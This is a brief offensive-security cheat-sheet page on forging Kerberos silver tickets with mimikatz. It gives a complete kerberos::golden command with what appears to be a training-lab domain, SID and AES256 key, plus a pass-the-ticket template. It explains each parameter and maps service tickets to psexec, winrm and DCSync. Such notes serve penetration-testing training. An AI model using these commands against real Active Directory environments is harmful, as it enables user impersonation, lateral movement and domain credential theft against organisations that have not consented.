Silver Ticket

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi

# OR
kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt 

Where:

  • /user is the username to impersonate. (any user)

  • /domain is the current FQDN domain name.

  • /sid is the current domain SID.

  • /target is the FQDN target machine.

  • /service is the target service

  • /rc4 is the NTLM hash of the computer account

  • /aes256 is the AES256 key for the target machine.

  • /ticket is the filename to save the ticket as.

Technique

Required Service Tickets

psexec

CIFS

winrm

HOST & HTTP

dcsync (DCs only)

LDAP

Note: we can use the target machine hash as the service hash for the filesharing service (CIFS).

Last updated